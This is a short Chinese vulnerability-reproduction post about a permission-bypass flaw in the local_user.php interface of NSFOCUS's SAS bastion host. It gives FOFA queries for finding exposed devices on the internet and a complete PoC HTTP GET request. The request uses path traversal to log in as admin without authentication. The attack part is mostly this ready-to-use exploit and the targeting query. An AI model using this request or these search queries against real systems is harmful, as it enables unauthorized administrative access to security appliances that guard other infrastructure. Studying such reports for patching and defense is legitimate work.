绿盟 SAS堡垒机 local_user.php 权限绕过漏洞复现

0x01 产品简介

SAS 安全审计系统是绿盟科技开发的一款堡垒机。

0x02 漏洞概述

绿盟 SAS堡垒机 local_user.php接口处存在权限绕过漏洞,未经身份认证的攻击者可以访问他们通常无权访问的敏感资源,最终导致系统处于极度不安全状态。

0x03 复现环境

FOFA:

body="'/needUsbkey.php'" || body="/login_logo_sas_h_zh_CN.png"

0x04 漏洞复现

PoC

GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

 使用HackBar测试

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2023-12-16 03:28:03       98 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2023-12-16 03:28:03       106 阅读
  3. 在Django里面运行非项目文件

    2023-12-16 03:28:03       87 阅读
  4. Python语言-面向对象

    2023-12-16 03:28:03       96 阅读

热门阅读

  1. Zabbix监控网站

    2023-12-16 03:28:03       53 阅读
  2. idea注释高亮提示

    2023-12-16 03:28:03       65 阅读
  3. 知识迁移加持下的自监督学习

    2023-12-16 03:28:03       61 阅读
  4. 第19节:Vue3 在模板中展开时的注意事项

    2023-12-16 03:28:03       61 阅读
  5. 使用Linux命令修改服务器时间及设置时区

    2023-12-16 03:28:03       62 阅读
  6. 【Python 千题 —— 基础篇】整数输入

    2023-12-16 03:28:03       60 阅读
  7. 数组练习之:二分查找法

    2023-12-16 03:28:03       52 阅读
  8. Android-Framework 默认横屏、dpi设置

    2023-12-16 03:28:03       74 阅读
  9. 11-二分-索引二分-第一个错误的版本

    2023-12-16 03:28:03       59 阅读